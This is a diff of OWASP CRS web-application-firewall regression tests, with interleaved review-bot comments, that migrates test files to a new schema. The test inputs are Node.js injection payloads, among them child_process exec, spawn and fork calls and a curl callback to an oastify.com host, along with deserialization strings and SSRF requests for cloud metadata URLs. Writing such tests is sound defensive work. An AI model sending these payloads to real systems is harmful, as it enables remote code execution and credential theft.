"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 20 desc: ssti test 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 
80 - uri: "/get?foo=process%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5Breq.query.a" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 21 desc: ssti test 4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require%5Breq.query.a" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 22 desc: ssti test 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5BmainModule" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5BmainModule" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 23 desc: require 
child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /get?foo=require("child_process").exec('whoami') - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /get?foo=require("child_process").exec('whoami') + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 24 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - process.env - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + process.env + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [934100] + - test_id: 25 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [934100] + - test_id: 26 desc: "5ZLKNU33" stages: - - stage: - input: + - input: dest_addr: 127.0.0.1 headers: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
@@ -426,89 +423,90 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" - - test_title: 934100-27 + log: + expect_ids: [934100] + - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$ND_FUNC$$_function()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-28 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$ND_FUNC$$_function()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-29 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-30 + - input: + dest_addr: 127.0.0.1 + 
port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-31 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 29cfc424f..fbb8fbcfb 100644 
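Review bot: Tests 28, 30 and 31 depend on single quotes to deliver `\u004e`, `\u0058` and friends to the WAF as literal backslash sequences, and nothing in the file says so; a maintainer who normalises the Cookie values to double quotes would turn them into real characters and silently make the obfuscation tests exercise the plain payload. Add above test 28's Cookie line `# single-quoted on purpose: the \uXXXX escapes must reach the server literally`; the same applies to the plain-scalar `Cookie: test_cookie=\u0072\u0065quire(...)` values in 934101 tests 7, 9 and 10. In the first hunk of this file, tests 8 and 9 are identical (same desc, same `uri: "/get?foo=XyQkTkRfRlVOQyQkXwo="`), so the renumbering carries forward a duplicate that adds no coverage; drop one or give it a different encoding of the same payload. Tests 24–26 keep `desc: "5ZLKNU33"`, which describes nothing; `desc: "process.env in POST body"` for test 24 and `desc: "console.info(1) in POST body"` for test 25 would match the data each sends (test 26's data falls between the two hunks and is not shown here).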
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml 
@@ -1,172 +1,170 @@ --- meta: author: "rekter0, azurit" - enabled: true - name: "934101.yaml" - description: "Tests for rule 934101" +rule_id: 934101 tests: - - test_title: 934101-1 + - test_id: 1 desc: additional node ssti tests 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 2 desc: additional node ssti tests 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" + 
version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 3 desc: additional node ssti tests 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 4 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require(\"child_process\").exec('whoami')" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require(\"child_process\").exec('whoami')" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 5 desc: require child_process spawn stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 6 desc: "Detect example payload require(... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 7 desc: "Detect example payload require(... 
submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 9 desc: "Detect example payload require(... 
submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] 
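Review bot: Test 5's uri carries `5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com`, which looks like a one-off out-of-band callback hostname copied from a live finding rather than deliberate test data. A regression corpus should not reference third-party infrastructure even when the request only reaches a local container; a reserved name such as `example.com` keeps the payload shape `lol(x).spawn('curl',+['...'])` intact, assuming rule 934101's match does not key on the hostname (the rule itself is not part of this diff). Test 4 quotes `uri: "/get?foo=require(\"child_process\").exec('whoami')"` while test 6's `Cookie: test_cookie=require("child_process").exec('whoami')` is a plain scalar; both parse today, but quoting the Cookie as well keeps the file uniform and protects the embedded quotes from a stricter parser.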
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 25fc7eee7..b71b664ce 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml 
@@ -1,151 +1,150 @@
 ---
 meta:
 author: "fzipitria, azurit"
- enabled: true
- name: "934110.yaml"
 description: "Test for vanilla SSRF in PL1"
+rule_id: 934110
 tests:
- - test_title: 934110-1
+ - test_id: 1
 desc: SSRF - check google cloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934110]
+ - test_id: 2
 desc: SSRF - check digitalcloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934110]
+ - test_id: 3
 desc: SSRF - check packetcloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-4
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934110]
+ - test_id: 4
 desc: SSRF - check openstack url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-5
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934110]
+ - test_id: 5
 desc: SSRF - check oracle cloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-6
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934110]
+ - test_id: 6
 desc: SSRF - negative test aws
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
- - test_title: 934110-7
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data"
+ version: "HTTP/1.1"
+ output:
+ log:
+ no_expect_ids: [934110]
+ - test_id: 7
 desc: SSRF - negative test aws
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
- - test_title: 934110-8
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest"
+ version: "HTTP/1.1"
+ output:
+ log:
+ no_expect_ids: [934110]
+ - test_id: 8
 desc: SSRF - negative test gcp
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
